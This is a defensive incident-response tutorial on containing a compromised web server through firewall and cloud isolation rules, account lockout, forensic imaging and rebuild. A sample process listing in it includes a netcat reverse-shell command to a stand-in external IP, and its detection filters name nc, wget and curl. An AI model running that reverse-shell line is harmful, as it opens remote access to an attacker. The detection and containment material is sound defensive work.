Breach containment isn’t about stopping the attacker; it’s about stopping the bleeding before you can figure out how to stop the attacker.
Imagine you walk into your kitchen and the sink is overflowing, water everywhere. Your first thought isn’t to figure out why the sink is overflowing (clogged drain, broken pipe, etc.). It’s to turn off the faucet. That’s containment.
Here’s a simulated incident: a web server is exhibiting unusual outbound network traffic, potentially indicating a compromise and data exfiltration.
# Initial observation: High outbound bandwidth from webserver-prod-01
$ sar -n DEV 1 5 | grep eth0
12:00:01 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
12:00:02 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
12:00:03 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
12:00:04 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
12:00:05 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
# Wait, that's not right. Let's try a more active monitor.
$ tcpdump -i eth0 -nn -c 100 'tcp and port 443' | awk '{sub(/:$/, "", $5); print $3, ">", $5}' | sort | uniq -c | sort -nr
56789 192.0.2.10:443 > 203.0.113.5:443
12345 192.0.2.10:443 > 198.51.100.20:443
5000 192.0.2.10:443 > 192.0.2.15:443
# The server `webserver-prod-01` (IP 192.0.2.10) is sending a lot of data to external IPs.
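The per-destination tally above can also be sketched as a small reusable function. This is a minimal sketch, assuming `tcpdump -nn` style lines on stdin; the function name `summarize_destinations`, the "internal prefix" argument, and the sample lines are illustrative assumptions, not real capture data.

```shell
#!/usr/bin/env bash
# Summarize `tcpdump -nn` lines read from stdin by destination IP.
# $1 is a hypothetical "internal" address prefix, e.g. "192.0.2."
summarize_destinations() {
  local internal_prefix="$1"
  awk -v prefix="$internal_prefix" '
    $2 == "IP" && $4 == ">" {
      dst = $5
      sub(/:$/, "", dst)          # drop the trailing colon
      sub(/\.[0-9]+$/, "", dst)   # drop the port, leaving the IPv4 address
      count[dst]++
    }
    END {
      for (dst in count) {
        label = (index(dst, prefix) == 1) ? "internal" : "external"
        print count[dst], dst, label
      }
    }
  ' | sort -k1,1nr -k2,2
}

# Illustrative sample in tcpdump -nn format (not real capture data).
sample_capture() {
  cat <<'EOF'
12:00:01.000001 IP 192.0.2.10.443 > 203.0.113.5.51000: Flags [P.], length 1448
12:00:01.000002 IP 192.0.2.10.443 > 203.0.113.5.51000: Flags [P.], length 1448
12:00:01.000003 IP 192.0.2.10.443 > 198.51.100.20.40222: Flags [P.], length 1448
12:00:01.000004 IP 192.0.2.10.443 > 203.0.113.5.51000: Flags [P.], length 1448
12:00:01.000005 IP 192.0.2.10.443 > 192.0.2.15.8443: Flags [.], length 0
EOF
}

sample_capture | summarize_destinations "192.0.2."
```

Grouping by destination address rather than by address and port keeps one noisy host from being split across many ephemeral ports. On a live system you would pipe `tcpdump -nn -c <count>` into the function instead of the sample.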
The core problem is that a compromised system can become a launchpad for further attacks, either against your other internal systems or externally, damaging your reputation and potentially incurring legal liabilities. Containment aims to sever these pathways.
Isolate the Affected System
This is the most immediate and impactful step. You need to stop the system from communicating with anything else.
- Diagnosis: Confirm whether the server is still reachable over the network.
    # From another machine, try to ping the webserver
    ping -c 3 webserver-prod-01
    # Try to SSH into the webserver
    ssh webserver-prod-01
  If these succeed, the system is still network-connected.
- Fix: This depends on your infrastructure.
  - Cloud (AWS): Modify the Security Group attached to the instance. Security groups contain allow rules only, so you block outbound traffic by revoking the rule that permits it rather than by adding a deny rule.
      aws ec2 revoke-security-group-egress --group-id sg-xxxxxxxxxxxxxxxxx --ip-permissions 'IpProtocol=-1,IpRanges=[{CidrIp=0.0.0.0/0}]'
    This revokes the default allow-all egress rule. Once no egress rule remains, the instance cannot open new outbound connections.
  - On-Premise (Firewall): Create an explicit deny rule at the top of your firewall policy for the server’s IP address.
      # Example Cisco ASA syntax. INSIDE_IN and "inside" are placeholders for the
      # ACL and interface that face the server.
      access-list INSIDE_IN line 1 extended deny ip host 192.0.2.10 any
      # Only needed if the ACL is not already bound to the interface
      access-group INSIDE_IN in interface inside
    This inserts a rule at the top of the ACL that blocks all IP traffic originating from 192.0.2.10 to any destination. If an ACL is already applied to that interface, add the deny line to it instead of binding a new one, because an ACL holding only this entry would drop everything else through its implicit deny.
  - On-Premise (Network Switch/Router ACL): Apply an Access Control List on the switch port or router interface where the server connects.
      # Example Juniper Junos syntax
      set firewall family inet filter BLOCK_OUTBOUND term BLOCK_SERVER from source-address 192.0.2.10/32
      set firewall family inet filter BLOCK_OUTBOUND term BLOCK_SERVER then discard
      set firewall family inet filter BLOCK_OUTBOUND term ALLOW_REST then accept
      set interfaces ge-0/0/1 unit 0 family inet filter input BLOCK_OUTBOUND
    This filters traffic arriving on the ge-0/0/1 interface (the port facing the server), discarding any packets originating from 192.0.2.10. The final accept term keeps the filter’s implicit discard from dropping all other traffic on that interface.
- Why it works: This severs the server’s network paths out of your environment, preventing further exfiltration or lateral movement.
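After applying an isolation rule, it helps to re-run the connectivity check in a repeatable way. The following is a minimal sketch, assuming bash and the coreutils `timeout` command are available; `probe_port` and `verify_isolated` are hypothetical helper names, and the port list in the example is an assumption. A probe from another machine exercises inbound reachability only, so to confirm that outbound traffic is blocked you would run the same probe from the server toward an external address.

```shell
#!/usr/bin/env bash
# Report whether a TCP port on a host accepts connections.
# Uses bash's /dev/tcp pseudo-device, so no extra tools are needed.
# "closed" here also covers filtered ports and timeouts.
probe_port() {
  local host="$1" port="$2" timeout_s="${3:-3}"
  if timeout "$timeout_s" bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$host" "$port" 2>/dev/null; then
    echo "open"
  else
    echo "closed"
  fi
}

# Probe a list of ports; return non-zero if any of them is still reachable.
verify_isolated() {
  local host="$1"
  shift
  local port status still_reachable=0
  for port in "$@"; do
    status="$(probe_port "$host" "$port")"
    echo "$host:$port $status"
    if [ "$status" = "open" ]; then
      still_reachable=1
    fi
  done
  return "$still_reachable"
}

# Example (hostname from the scenario; the port list is an assumption):
#   verify_isolated webserver-prod-01 22 80 443 && echo "isolation confirmed"
```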
Identify and Block Malicious Destinations
Even if you can’t isolate the server immediately, you can stop it from talking to the specific bad guys.
- Diagnosis: Use the tcpdump output from earlier or firewall logs to identify the IPs the server is communicating with. Look for unusual, high-volume connections to external, non-standard IPs.
    # Re-run tcpdump to capture more recent traffic if needed
    $ tcpdump -i eth0 -nn -c 100 'tcp and port 443' | awk '{sub(/:$/, "", $5); print $3, ">", $5}' | sort | uniq -c | sort -nr
  In our example, 203.0.113.5 and 198.51.100.20 are suspicious.
- Fix: Add firewall rules to block outbound connections to these IPs.
  - Cloud (AWS): Security groups cannot express deny rules, so add explicit deny entries to the network ACL of the server’s subnet instead. The ACL ID and rule numbers below are placeholders; the rule numbers must be lower than those of any allow entries that would otherwise match.
      aws ec2 create-network-acl-entry --network-acl-id acl-xxxxxxxxxxxxxxxxx --egress --rule-number 50 --protocol -1 --cidr-block 203.0.113.5/32 --rule-action deny
      aws ec2 create-network-acl-entry --network-acl-id acl-xxxxxxxxxxxxxxxxx --egress --rule-number 51 --protocol -1 --cidr-block 198.51.100.20/32 --rule-action deny
  - On-Premise (Firewall):
      # Example Palo Alto Networks PAN-OS syntax; webserver-prod-01 is assumed to exist as an address object
      set rulebase security rules BLOCK_EXTERNAL_IPS from <your-internal-zone>
      set rulebase security rules BLOCK_EXTERNAL_IPS to <your-external-zone>
      set rulebase security rules BLOCK_EXTERNAL_IPS source webserver-prod-01
      set rulebase security rules BLOCK_EXTERNAL_IPS destination [ 203.0.113.5 198.51.100.20 ]
      set rulebase security rules BLOCK_EXTERNAL_IPS application any
      set rulebase security rules BLOCK_EXTERNAL_IPS service any
      set rulebase security rules BLOCK_EXTERNAL_IPS action deny
      set rulebase security rules BLOCK_EXTERNAL_IPS description "Block known bad IPs outbound"
    This creates a rule that explicitly denies any traffic originating from the server in your internal zone and destined for the specified malicious IPs. Place it above any rule that allows the same traffic.
- Why it works: This prevents the compromised server from communicating with known command-and-control servers or data drop points, even if it’s still running.
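When the list of bad destinations grows, generating the block entries from a list is less error-prone than typing them one by one. The sketch below only prints commands for review and does not run them. It assumes the AWS approach of network ACL deny entries (security groups hold allow rules only); `is_ipv4`, `emit_nacl_denies`, the ACL ID, and the starting rule number are all hypothetical.

```shell
#!/usr/bin/env bash
# Return success if $1 looks like a dotted-quad IPv4 address with octets 0-255.
is_ipv4() {
  local ip="$1" octet
  printf '%s\n' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  for octet in $(printf '%s' "$ip" | tr '.' ' '); do
    [ "$octet" -le 255 ] || return 1
  done
}

# Print (do not run) one egress deny entry per valid address.
# $1 = network ACL ID, $2 = first rule number, remaining args = IP addresses.
emit_nacl_denies() {
  local acl_id="$1" rule="$2" ip
  shift 2
  for ip in "$@"; do
    if ! is_ipv4 "$ip"; then
      echo "skipping invalid address: $ip" >&2
      continue
    fi
    echo "aws ec2 create-network-acl-entry --network-acl-id $acl_id --egress" \
         "--rule-number $rule --protocol -1 --cidr-block $ip/32 --rule-action deny"
    rule=$((rule + 1))
  done
}

# Placeholder ACL ID; the addresses are the two suspicious IPs from the example.
emit_nacl_denies acl-xxxxxxxxxxxxxxxxx 50 203.0.113.5 198.51.100.20
```

Printing the commands first gives a second responder the chance to review them before anything changes in production, which matters when a typo in a CIDR could block legitimate traffic.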
Disable Compromised User Accounts or Services
If the compromise is tied to specific credentials or a running process, disabling them can stop the attack.
- Diagnosis: Examine process lists and user logins on the server.
    # Look for suspicious processes (-w matches whole words, so "sh" does not match "sshd")
    $ ps aux | grep -v root | grep -v 'your_app_user' | grep -Ew 'bash|sh|nc|wget|curl'
    # Check for unusual logins
    $ last | head
  If you see processes like nc (netcat) or wget running with unusual arguments, or logins from unexpected users/IPs, this is a strong indicator.
- Fix:
  - User Account: Lock the account.
      # Linux: lock the password (key-based SSH logins can still succeed)
      sudo usermod -L compromised_user
      # Or better, expire the account
      sudo chage -E 0 compromised_user
      # Neither command ends existing sessions, so kill the user's running processes
      sudo pkill -KILL -u compromised_user
    This prevents compromised_user from logging in again and terminates the processes already running under that account.
  - Service: Stop and disable the service.
      # If it's a systemd service
      sudo systemctl stop suspicious.service
      sudo systemctl disable suspicious.service
    This stops the malicious process from executing and prevents it from starting on reboot.
- Why it works: This removes the specific identity or mechanism the attacker is using to operate on the system, effectively cutting off their access through that vector.
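Substring matching on a process list produces false positives (for example, `sh` also matches `sshd`). The sketch below matches on the executable name instead. It assumes input in the format of `ps -eo user,pid,args`; the function name `suspicious_procs`, the watch list, and the sample listing are illustrative assumptions.

```shell
#!/usr/bin/env bash
# Filter `ps -eo user,pid,args` output (read from stdin) down to processes
# whose executable name is on a watch list and whose owner is not excluded.
# $1 = space-separated users to ignore, $2 = space-separated program names.
suspicious_procs() {
  awk -v ignore="$1" -v watch="$2" '
    BEGIN {
      n = split(ignore, a, " "); for (i = 1; i <= n; i++) skip[a[i]] = 1
      n = split(watch, b, " ");  for (i = 1; i <= n; i++) flagged[b[i]] = 1
    }
    NR == 1 && $1 == "USER" { next }   # skip the ps header row
    ($1 in skip) { next }              # skip excluded owners
    {
      exe = $3
      sub(/^.*\//, "", exe)            # strip the directory part of the path
      sub(/^-/, "", exe)               # login shells appear with a leading dash
      if (exe in flagged) print
    }
  '
}

# Illustrative listing (not real data).
sample_ps() {
  cat <<'EOF'
USER       PID COMMAND
root         1 /sbin/init
deploy     900 sshd: deploy@pts/0
deploy     901 -bash
www-data  2301 nginx: worker process
www-data  4410 /bin/sh -c nc -e /bin/sh 203.0.113.5 4444
www-data  4411 nc -e /bin/sh 203.0.113.5 4444
EOF
}

sample_ps | suspicious_procs "root your_app_user" "bash sh nc wget curl"
```

On a live host you would replace `sample_ps` with `ps -eo user,pid,args`. A hit is a prompt to look closer rather than proof of compromise: an administrator’s interactive shell will be listed alongside a reverse shell.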
Take a Forensic Snapshot
Before you wipe or rebuild, you need evidence.
- Diagnosis: This isn’t a diagnostic step, but a preparatory one. You’ve identified a compromise and are moving to containment.
- Fix: Create a disk image and a memory dump of the affected system. Where you can, capture memory first, since it is the most volatile evidence.
  - Disk Imaging (e.g., using dd or specialized forensic tools):
      # From a separate forensic workstation or a live CD
      # WARNING: dd overwrites whatever of= points to. Double-check both if= and of= before running.
      sudo dd if=/dev/sda of=/mnt/forensic_storage/webserver-prod-01.img bs=4M status=progress
    This creates a bit-for-bit copy of the server’s primary disk (/dev/sda) to a safe, external storage location (/mnt/forensic_storage/webserver-prod-01.img).
  - Memory Dump (e.g., using LiME (lime-forensics) to capture, with Volatility for later analysis):
      # Using LiME (Linux Memory Extractor)
      sudo insmod /path/to/lime.ko "path=/mnt/forensic_storage/webserver-prod-01.mem format=lime"
    This kernel module loads into the running kernel and dumps the system’s RAM contents into a file, capturing volatile data like running processes and network connections that are lost on reboot.
- Why it works: This preserves the state of the compromised system for later analysis, allowing investigators to understand the attack vector, scope, and impact without altering the original evidence.
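An image is only useful as evidence if you can later show it has not changed. A common practice is to record a cryptographic hash right after acquisition and re-check it before analysis. This is a minimal sketch, assuming `sha256sum` is available; the helper names `record_evidence_hash` and `verify_evidence_hash` are hypothetical.

```shell
#!/usr/bin/env bash
# Write a SHA-256 manifest (<file>.sha256) next to an evidence file.
record_evidence_hash() {
  local file="$1"
  ( cd "$(dirname "$file")" &&
    sha256sum "$(basename "$file")" > "$(basename "$file").sha256" )
}

# Re-check the file against its manifest; a non-zero exit means it changed
# or the manifest is missing.
verify_evidence_hash() {
  local file="$1"
  ( cd "$(dirname "$file")" &&
    sha256sum -c "$(basename "$file").sha256" >/dev/null 2>&1 )
}

# Example (path from the imaging step above):
#   record_evidence_hash /mnt/forensic_storage/webserver-prod-01.img
#   verify_evidence_hash /mnt/forensic_storage/webserver-prod-01.img && echo "image intact"
```

The manifest stores a relative file name, so the image and its `.sha256` file can be moved together to another analysis machine and still verify.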
Revert to a Known Good State
Once contained and potentially imaged, the fastest way to ensure a clean system is often to replace it.
- Diagnosis: You’ve performed containment, taken snapshots, and are ready to remediate.
- Fix:
  - Rebuild: Provision a new server from scratch using your standard build pipeline (e.g., Terraform, Ansible, Chef).
  - Restore: Restore from a known good backup taken before the compromise.
      # Example of restoring a database from a backup
      psql -U myuser -d mydatabase < /path/to/good_backup.sql
  - Patch/Scan: If the compromise was minor and you have a strong understanding of the vulnerability, you might patch the existing system, but rebuilding is generally safer.
- Why it works: A system rebuilt or restored from trusted sources leaves no place for residual malware or backdoors to hide, which gives you far more confidence in its integrity than cleaning the compromised system in place.
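"Taken before the compromise" is worth checking mechanically before a restore. The sketch below compares a backup file’s modification time with an estimated compromise time. It assumes GNU `stat`, and `backup_predates` is a hypothetical helper. Treat the result as a first filter only: timestamps can be altered, and attackers are often present well before they are detected.

```shell
#!/usr/bin/env bash
# Succeed only if the file's modification time is earlier than the cutoff.
# $1 = backup file, $2 = cutoff as a Unix timestamp (seconds since the epoch).
# Returns 2 if the file cannot be inspected.
backup_predates() {
  local file="$1" cutoff="$2" mtime
  mtime="$(stat -c %Y "$file" 2>/dev/null)" || return 2
  [ "$mtime" -lt "$cutoff" ]
}

# Example (the date is a hypothetical estimate of when the compromise began):
#   cutoff="$(date -d '2024-05-01 00:00:00 UTC' +%s)"
#   backup_predates /path/to/good_backup.sql "$cutoff" && echo "candidate for restore"
```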
The next hurdle you’ll likely face after containment is understanding how the breach occurred, which involves deeper forensic analysis.